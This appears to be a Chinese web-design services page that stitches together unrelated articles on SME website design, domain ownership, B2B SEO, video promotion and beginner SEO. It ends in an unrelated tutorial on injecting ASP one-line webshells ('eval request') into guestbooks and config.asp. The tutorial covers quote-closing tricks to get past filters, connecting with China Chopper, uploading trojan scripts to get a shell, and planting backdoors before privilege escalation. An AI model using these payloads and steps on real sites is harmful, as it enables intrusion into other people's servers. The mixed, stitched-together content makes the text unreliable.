企业网站建设

建站知识

今日已发布信息: 411500
累计注册用户: 51059908

网站设计中常犯的错误

大企业网站 产品描述 号的衣服

概述: 客户的关注点是完全不同的。     大企业具有强大的品牌优势,客户信任度相当高,客户在购买他们的产品时往往考虑的很少,只要产品符合客户的需求并且在他的预算范围之内,他往往就会下单。     而对于中小企业来讲,客户对其信任度基本为0,通过一个网站烘托出高大上的品牌形象就能带动销量的想法基本是很傻很天真的,除非你肯花大价钱去推广,这个大价钱肯定不是一年几万、几十万的广告费用的问题了 ,最近派代上很热的一篇讨论帖就是体现的这个问题(三年KA电商经验,三个月投资6万淘宝女装小C店至今0销量,跪求大侠前辈们解剖店铺)。

    一、客户到达大企业网站和中小企业网站的方式往往是不同的。

    以搜索引擎为例,对于大企业来讲,由于其品牌和产品已经在消费者心目中有了根深蒂固的地位,所以,消费者在购买时往往直接采用“品牌名+产品名”、“公司名+产品名”这样的搜索词,这样一来,他们很容易就能到达大公司的网站,并且,大企业由于长时间的积累和品牌认知度,已经有了很庞大的、很稳定的客户源,这样,即使他们的网站是整站FLASH也问题不大。
而对于小企业来讲,由于品牌知名度很低,客户大多会通过“产品名”这样的搜索词来到我们的网站,在这个过程中,网站的优化、META信息的设定等起到了关键作用。

    也就是说,大企业网站不刻意做搜索引擎优化也是可以的,而我们中小企业如果这样做,无异于自掘坟墓。
仅从这一点上来讲,就决定了大企业网站设计和中小企业网站设计关注的重心完全不同。

    二、在同时浏览大企业网站和中小企业的网站时,客户的关注点是完全不同的。

    大企业具有强大的品牌优势,客户信任度相当高,客户在购买他们的产品时往往考虑的很少,只要产品符合客户的需求并且在他的预算范围之内,他往往就会下单。

    而对于中小企业来讲,客户对其信任度基本为0,通过一个网站烘托出高大上的品牌形象就能带动销量的想法基本是很傻很天真的,除非你肯花大价钱去推广,这个大价钱肯定不是一年几万、几十万的广告费用的问题了 ,最近派代上很热的一篇讨论帖就是体现的这个问题(三年KA电商经验,三个月投资6万淘宝女装小C店至今0销量,跪求大侠前辈们解剖店铺)。

 

  大冶中小企业建站  控制器   今日推荐免费建站   分类信息   达州网站建设公司

 

    来到我们中小企业网站上之后,客户会通过产品描述、公司描述、成交案例、成交量来衡量这个公司是否值得信任。
如果说产品描述是用来帮助客户确认这个产品是否是他需要的,那么,成交案例和成交量则成为他用来确认这个产品描述是否是真实的、这个公司是否可信的关键因素。
人是有从众心理的,这一点在淘宝等购物网站上表现的更明显,你产品描述的再好如果没有成交量也很难让人产生购买行为。

    也就是说,网站的富丽堂皇只能带给客户第一印象(很多中小公司为了这个第一印象而牺牲SEO优化,这是相当不明智的),决定他是否有下一步行动的,却往往取决于成交量这样的销售指标。
没有成交量做支撑的中小企业,网站做的再美,都是空中花园,可供观赏但不能产生太多实际价值,除非你把自己的网站当成旅游胜地啦~

    中小企业一般都要经过不断扩大销售——量变引发质变——形成品牌这样的过程,我们的网站设计也应该是追寻这个逻辑。
想要一步到位,一下实现销量和品牌双目标,那基本是痴人说梦。
如果你问我,一个以促进销售为核心的网站和一个以品牌推广为目的的网站有什么区别,我建议你对比下天猫淘宝上各大店铺和你们行业最知名的两个大企业的网站,在版面、布局、栏目、首页、产品描述、视觉中心、SEO优化、网站设计语言、其背后的逻辑等等方面的区别。

    在我经历过的公司和接触过的中小企业,不盲目追求高大上的老板相对较少,在我们设计网站时也往往会遭遇到老板“网站不够炫”、“网站应该有好看的动画效果”等等这样的质疑和追问,这个时候,就需要拿出我们专业的知识和良好的沟通能力,来和老板分析为什么大企业是那样做网站,而我们不能那样做,就像是高个的人要穿大号的衣服,矮个的人要穿小号的衣服,矮个的人穿大号的衣服不是不行,但是会影响行动。

    这个观点已经被无数网站设计方面的权威和专家讲烂了,可是在与现代的营销理念和管理理念脱离甚远的传统企业(特别是工业品企业),还很缺乏执行下去的基础。
我希望,电商行业那种追求实用、效率、效果和回归本质的思维方式能够慢慢影响到其他行业的网站设计。

 

“一站式做站服务”的隐忧 本人花钱做的网站竟然不是本人的

  

 

  我记得2006年11月,我在网上找到一个网页设计师,请他给我做了一个深圳都市收废网。由于当时我不懂网站,所以域名、空间、数据库都是由那个设计师一并代购的,也就是所谓的一站式建站服务。

  收废网是我的第一个网站,设计得很漂亮,我很喜欢。那个设计师给了我网站的后台登陆地址、账号和密码,我能够随时登陆到后台去更新信息,查询注册会员信息。我理所当然认为,这个网站是我的了。

  可是有一次,不记得什么原因了,忽然就谈到了网站所有权的问题。那个设计师竟然对我说:这个网站的所有权是我的,你只有使用权。

  我当时一听就懵了。这网站明明是我花了钱的,怎么我还只有使用权,没有所有权呢?所以我就跟他据理争辩。可是他根本不理会我。由于他人在桂林,我在深圳,只能通过QQ沟通,所以他一旦沉默不说话,我再怎么争辩,也无济于事。

  后来当我深入地了解了网站建设行业之后,我发现,对于中国千千万万的企业(尤其是中小企业)来说,他们对于自己的官方网站,的确没有所有权,而只有使用权。

  原因何在呢?

  就在于那个所谓的“一站式建站服务”。

  通常,中小企业对于网站建设基本上是一窍不通,域名、空间、数据库的购买,以及网站的制作,都是一起交给网络公司一条龙服务的。网络公司在空间商网站(通常是万网、新网)上注册、购买域名、空间、数据库后,虽然注册的信息是客户的,但是域名密码、IP地址、FTP账号和密码、数据库账号和密码,统统都是掌握在网络公司手里的。而客户由于不懂这些,所以也就没有意识到要去向网络公司索要这些数据资料。

  如此一来,客户这些重要的数据资料,便都牢牢地控制在网络公司手里,这就相当于,这个网站的所有权其实就是网络公司的,而客户花了所有的钱,却只有这个网站的使用权。

  这样导致的后果是什么呢?

  由于网络公司在市场上的生存期一般都很短,都是一拨起来一拨消失,所以如果你的网站服务商倒闭了,那么,当你的网站域名、空间、数据库到期了(一般都是一年一个周期),你却无法找到你的服务商给你续费了,那么,很抱歉,你的官方网站就会自动关闭。对于这种事情,企业自己一般都无法找到解决的途径,只好重新再找另外一家新的网络公司,购买新的域名、空间、数据库,制作新的网站。这样有多麻烦,你应该很清楚。

  最近我一个SEO学员,就碰上这种烦心事儿。他的企业官方网站,是2011年做的,当然是所谓“一站式建站服务”,网络公司把域名、空间、数据库都替他代购了,然后总共收取了他5800元的费用,说是另外还有两年的维护费。结果,就在今年8月份,我的这位学员找到我说,那家网络公司倒闭了,现在没人了,他的域名也到期了,网站也随之关闭了。

  我还有个SEO学员,对原来的网站不满意,想请我给他做个新的网站。我叫他到原来的网络公司把FTP账号和密码、数据库账号和密码都要回来,并且还叮嘱他必须要求原来的网络公司到时配合帮忙解压,这样网站才能正常上线。但没想到的是,那家网络公司偏偏不愿意给他那些数据资料,扬言说要做新网站必须到他们那里做。——这就真的没办法了,谁叫那些数据资料都掌握在那些网络公司手里呢。他们愿意给你,是职业道德情操不错;他们不愿意给,你也没招,你总不能去打官司吧。

  这一切的麻烦,都来自于:网络公司帮你代购的域名、空间、数据库,密码都掌握在他们手里。

  所以,对于那些没有拿到这些数据资料的企业,一个没法改变的事实就是:他们花了钱,却只有网站的使用权,而没有所有权。

  即使你的服务商愿意把那些数据资料提供给你,你也要去请求他们帮助解压,然后网站才能上线。这样其实是很麻烦的。

  所以,如果你想真正控制你的网站,你最好的方式就是:自己到空间商的网站上(比如万网、新网),去购买域名、空间、数据库,然后做好域名的备案。把这些做好之后,你以后的网站就完全控制在你的手里了,你可以到期后自己去续费,也可以随时更换服务商去改版网站。一切由你自己做主了。

  所以,如果有人要请我给他做网站的话,我一定会建议他自己去购买域名、空间、数据库。这是真正为了客户的利益着想。

长尾词可以好好利用B2B平台

  本来企业站的长尾关键词排名就不是很容易,网站权重本身就需要很高,另外时间需要很长。最近SEO界关注的比较少,研究阿里旺铺去了,阿里旺铺这块也少不了SEO。也需要百度收录并带来流量,我发现我的旺铺百度收录的还是不错的。但有一点原因是不能带来流量,把收录了的页面整个标题打在搜索框中都搜索不到我的产品。但我倒发现另外一点在搜索某个产品型关键词的时候,居然有的结果10个都是阿里巴巴结果,但并非是产品结果,而是一种聚合的结果,比如频道结果,搜索结果类似这样的页面。

  前两天跟SEO业内的朋友进行交流,它们也有同感,据它们分析,由于百度受360竞争。流量下降,为了提升收益逼迫企业站做竞价,把企业站的权重调的极低。把B2B行业站的权重调的很高,在很多产品方面,B2B排名都是很靠前的。企业站这块排名情况很是不乐观,它们说做几个新站都收录很慢,收录了很久也没有排名。想靠百度过活真的是越来越不容易了,其实我倒不这样看,只要百度还没有到把所有的流量都倒向自己的网站或者合作伙伴的网站那一天,我们就还有机会。

  再说有一些长尾需求是一定需要某种页面才能解决的,这时候我觉得都会出现一批真正以用户需求为出发点的小而美的站点,这样的站点也一样能获得搜索引擎好的排名和流量。目前百度把很多B2B的位置放的很前,那么我们就去利用B2B平台为我们获取好排名就可以了啊。我们可以测试哪些B2B排名的权重高,我们就上哪些平台去发布自己的信息,我们甚至可以不在乎它本身的站内流量,如果你用的好的从搜索引擎吸引进来的流量比你在它站内获取的流量还要大呢?

  我经常看一些创业导师这样说,我们不要一创业的时候就跟百度,阿里,腾讯竞争。我们只能依附于它,利用它,在现阶段我们也只能利用这些平台为我们的产品获取好的排名。其实我们可以跟着流量走,流量在哪里我们就在哪些,这样也是不会有错的。微博的崛起,我们去微博引流,微信强大了我们利用微信引流。现在百度青睐平台了,我们就把重点放到平台上去,总之我们在研究的时候可以发现,哪些网站权重高排名靠前,我们的产品就出现在哪些平台。

  不知道今年有多少朋友感受到了百度这个变化,因为笔者也只不过是问了几个朋友,结合自己的情况做出的推断。可能数据样本过小,不值得信赖,但思维方式一定是这样的。其实网站的缺陷很多,需要靠很多别的东西去弥补。比如交互不足我们就得结果微博,QQ群。权重不高不能获取长尾词排名就得利用第三方平台,当然这第三方平台也很多,比如B2B平台,分类信息,问答,贴吧论坛都可以的,有些东西比我们强大,那我们就不能打败它们就去利用它们吧,让它们为我们所用,这才是上上之策。

视频推广战略 提升网站硬实力

  今天早上拿起手机在百度查了一下西安seo这个关键字,哎呀,没想到进入首页了,真是无限高兴,丰富喜悦啊。高兴之余来给大家分享我在SEOmoz取经回来的新型的网站推广策略-视频推广。每次去SEOmoz都会有所收获,全英文的站点看起来会有些吃力,但是吃力的同时你会有以外收获,E文一般的可以借助GG在线翻译,最新的技术还是国外流行的比较快,赶紧拿来抛砖引玉的给干涸的国内市场注入新的血液。废话不多,正题开始。

  如果说网站排名是被动的跟着搜索引擎走,是软实力的话,那么视频推广方法就是打造网站硬实力的策略。 也许已经有很多人在不经意中使用视频进行过推广了,但是下面说的可能会更具体更直观一些:

  下面的图片是SEOmoz中Creating an Online Video Strategy一文中例举的图片。下面这张图,在视频右侧用户信息部分显示了可以订阅该用户的视频,而且还在视频信息部分填写了这家公司的网址和他所提供的服务内容信息。

  

 

  视频网站有个缺点,就是自动压缩视频,这会使质量不好的视频显示的很有问题,显示不清晰。所以在制作视频文件的时候一定要注意做出高清晰度的视频内容。

  高质量的视频内容(比较有趣实用的)加上高清晰的视频画面,再把所要推广的公司网站的信息嵌入到视频中去,这就形成了广告的强制诉求!这个跟现实生活中的公交车广告基本上是一个性质,公交你一天要坐几次,车厢和车内的广告不由自主的会让你注意到,公交车你可以不坐?你没有选择性,完全是处于被动的状态。好的视频内容也是一个道理,内容好了,广告信息也就完全强制性的进入了看客的眼中,重要的是视频网站有订阅和引用功能,广告信息量会随着时间的推移扩散开,打造网站硬实力靠的就是这些免费的高质视频资源。

  下面分别说明一下视频网站缺点和优点:

  缺点:

  2.就算你有再好的视频内容,但是用户打开的都不是你的网站而是视频提供商的站点。

  3.你不可能从你的提供视频中赚取广告费(你不可能在视频中嵌入点击式的广告)。

  4.没有人分享、链接你的视频,也就没有扩散推广的效果。

  5.视频中往往还会出现别人的广告(很常见,GG的广告我见了好多次)。

  6.视频输出的质量不高(经过了压缩变得不够清晰),播放时间也很有限(国内的优酷好像没有限制,YouTube貌似限制为10分钟)。

  优点:

  1.非常容易上传(合法内容)。

  2.没有带宽的限制(可以肆无忌惮的上传你的视频资源)。

  3.很容易分享(扩散推广的优势所在)。

  4.非常大的流量(视频网站的用户群十分强大,流量更不用说)。

SEO新手必需要懂的技术

  先学习再建站

  有一句至理名言:磨刀不误砍柴工。对于新手站长在建站之前也是要先磨磨刀,也就是要给自己充充电,然后再建站,这样就能够避免在建站的道路上少走弯路!

  笔者在建站初期就没有学好这建站基础,因为太急功近利了,在还没有把建站的知识没有搞清楚之前就迫不及待的开始着手建站了,虽然了解一点网页三剑客,可是总觉得有点杯水车薪,不够用的,于是在建站一段时间后发现网站做完了产生了很多的冗余代码,结构非常的混乱,这样做成的网页非常不利于搜索引擎的收录,也不利于后期的改版,当然这里不是说网页三剑客不好,关键是自己没有掌握好,于是又重新学习CSS+DIV布局,也是学了个大概又开始捣鼓网站,最后还是不停的修改网页,搞得耽误了太多的时间了!

  当然不是说要大家把基础打到第九层,学一些常识和系统建站的过程,就可以了,而更多的技巧和高深的内功那就要在建站的过程中自己不断学习和经验不断的积累!

  HTML和CSS语言需掌握

  现在的网页设计基本上都是所见即所得,网页三剑客更是如此,不过当你了解网页的设计知识之后你会发现这些软件只不过是工具而已,真正用到的还是html和css语言,所以这两门语言是必须要学会的!

  CSS+DIV布局

  网页设计的开始就是布局,布局好了,设计就会变得简单不少,可是之前我就是不了解CSS,完全使用表格布局发现会有很多的弊端,在我学会了CSS+DIV的布局之后我自然重新使用CSS+DIV的布局来设计网页了!而且现在CSS+DIV也是现在WEB的标准!

  网站空间和域名的选择

  域名是你的网站的地址,空间则是你网站的家,所以这两点是非常重要的,域名最好选择容易记忆的,而且和网站的内容有一定的相关性,看到了你的域名就大概知道你的网站的内容,笔者在这上面就吃了亏了,我买的第一个域名最后就没有用,所以大家最好在选择域名的时候要多多的动脑筋哦!

  至于空间那就更重要了,因为你的家如果不稳定,那么又怎么能够让你的网站吸引人呢?空间一定要稳定,而且访问的速度要足够快,要不然会影响到用户的体验,同时也会影响到搜索引擎的访问,而且网站的空间如果是和别人公用的,还要注意别人的网站是不是垃圾站或者有没有被K过,这样的站和你共存一个空间是绝对不行的,你的站也会因此受到牵连,蜘蛛也会认为你不是什么好站。

  程序选择

  做网站前就要选择程序了,特别现在的网站都有很多的内容,每天都需要更新管理,如果没有程序进行管理的话,那么你的工作任务会异常的庞大,所以选择一款好的网站程序就变得很重要了,现在网上有不少的开源程序,比如帝国,织梦和PH168,所以选择一个合适的程序对你的网站建设的帮助会很大的!当然这些程序还能够进行定制,如果你技术足够好的话,还能够进行修改!

  备案

  使用国内的空间就一定要备案,一般国内的空间商都会提供备案服务的,而且备案很快也能够通过,本人就曾经把两个域名和空间进行了备案,三两天也就完成了,不过你要是增加域名或者期间要更改资料,那么就需要花费较长的时间进行备案了,笔者就因为第一个域名放弃了,然后增加了一个域名,让我等了快一个月了!

  SEO知识不可少

  网站制作好了,那就要进行推广,进行优化,通过SEO优化让你的网页能够在搜索引擎排名中获得较好的位置,这样才能够更容易让别人点击,而且现在基本上有六成以上的流量都是可以通过搜索引擎获得的!可见SEO是非常重要的!

  网站优化别忘记了用户体验

一句话使用技巧

1进入后台之后找网站信息配置

2在企业邮局里面拷贝出来邮箱做好记录,恢复用

3在企业邮箱内插入一句话

4保存配置,打开中国菜刀

5http://www.xxxx.cn/inc/config.asp 其中XXXX为你的目标站

6菜刀右键添加,把网址第五步的丢进去  右边那一栏输入一句话的密码pass(默认)下

面的脚本类型为asp 其他不变  最后点添加

7用中国菜刀链接点击文件管理 

8在inc目录下上传一个小马(注意更改后缀为asp)

9 打开http://www.xxxx.cn/inc/你的小马名字.asp

10 打开小马输入密码进入小马

11 复制文件地址输入上面的栏中后面加大马名字.asp

12 把大马以txt文档形式打开,复制粘贴至下面的栏中。

13 保存

14 访问11步骤中的大马

15 输入大马密码,成功得到shell

一句话的总结

一 留言本插入


在留言框内 插入一句话 

<%eval request("#")%>

<%execute request("#")%>

┼攠数畣整爠焕敌瑳∨≡┩忾

这三个都是asp一句话,在国内小站asp还是比较泛滥的。如果当前web没有进行过滤可以直接以留言的方式提交过去。

如果过滤不严可以闭合插入。如最简单的

%><%eval request("#")%><% 

比如当前页

http://site/guest/guestbook.asp

你在当前页提交一句话后是不能直接链接http://site/guestbook.asp的,因为一句话代码并不在这里!

这里需要一个前提条件

1)他的数据库是为了防止*.mdb 下载而更名为

*.asa or *.asp 格式

2)满足了条件1的同时你知道他的数据库位置

ex:http://site/guest/db/guestdb.asa or guest.asp

当满足第一条 和第二条中的两小条后

可以成功插入一句话

数据库修改过后缀名 asa asp

知道具体位置

满足以上条件后 在 http://site/guest/guestbook.asp 插入一句话

链接 http://site/guest/db/guestdb.asa



二 配置文件插入一句话



一般而言,后台插一句话,如果数据库扩展名是asp的话,那么插数据库,但是如果有配置文件可以插的话,那肯定是插入配置文件了,但是插入配置文件有一个很大的风险,那就是一旦出错那么全盘皆输,有可能不仅仅造成后台无法登陆,甚至有可能是整个网站系统崩溃,所以插入配置文件,请慎之又慎。


话归正题,如果想插入配置文件,一般是config.asp,那么首先需要了解这个文件的一般情况。


网站的配置一般是保存网站名,地址,email之类的,既然是字符,那么格式应当是

webname=“test website”


对于这样的配置插入一句话的话,我们的机会就是替换test website,那么需要闭合2个”,同时要插入一句话,语句可以这样


“%><%eval request(“d”%><%s=”


那么在config.asp中就是


webname=“ “%><%eval request(“d”%><%s=” ”

第一个”是闭合前面的配置文件中的”,%>就是闭合前一段脚本,之后插入一句话<%eval request(“d”%>,现在要闭合原来的”和%>


所以加入<%s=”,这里特别要注意“s=”,如果没有这个等号的话,那么就会成<%” “,这样必将出错。


好了,这是常规的办法,现在我们回到开始那个问题,按照前面的方法插入


插入后,我们再点击“网站设置” ,出现错误


从这个错误,我们可以得到2个信息。


第一,配置文件的路径:http://www.365128.com


第二,网站名的变量为webname。


由于我们闭合前面双引号起”的那个双引号收”被过滤成单引号’,所以就成了webname=” ‘,这样的话那么这个双引号没有闭合,由于双引号是vbscript的控制符,没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。


由于插入一句话必须要用双引号括起来,而输入双引号又被过滤,所以我们可以利用他们自身的双引号来解决。


在配置文件中,我们还可以看到这样一些设置

就是配置网站的公告数 ,文章数等。可以假设一下,他必然是整数赋值,没有双引号包括

num=5

num是整数型,不然就成字符了num=”5〃


那么我们的一句话就可以这样构建


在公告数中我们插入5%><%eval request(webname)%><%


必须要有5,不然将会出错,在网站名中我们插入”open”


由于我们没有输入双引号,不存在过滤,我们利用 配置文件本身的双引号来达到目的。那么配置文件现在的内容如下


<% ……………….. webname=”open” num=5%><%eval request(webname)%><% webnum=7 ……. %> 我们的一句话就相应为

eval request(“open”),open为seo/’>密码。


用菜刀成功连接


从上可见,我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。


那么在网页设计方面,我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号,禁止这些符号的输入,那么将大大增加网页安全。



三 网站友情链接或者是管理员添加插入一句话,等等...就跟配置文件类似




当成功在配置文件中插入一句话后,可以连接 http://site/inc/config.asp

也就是说你的一句话最终保存在那个asp文件中你就去连那个ASP文件,并不是你在留言本主页插入的一句话你就去连接留言本主页!

你需要知道你的一句话的归属地。




在成功得到webshell ,需要先留后门在进一步提权。因为你提权时弄出动静后会前功尽弃。留一个一句话是很好的选择。


可以把后门直接写入在asp文件中,也可以自己重新上传一个ASP马,在修改原有ASP文件的同时需要备份一下以防插挂后可以补救。有人喜欢插入在dbcon.asp 数据连接文件中或者其他位置。这个跟当时情况而定。 


http://daye.kvov.com.cn/jzxx10692.html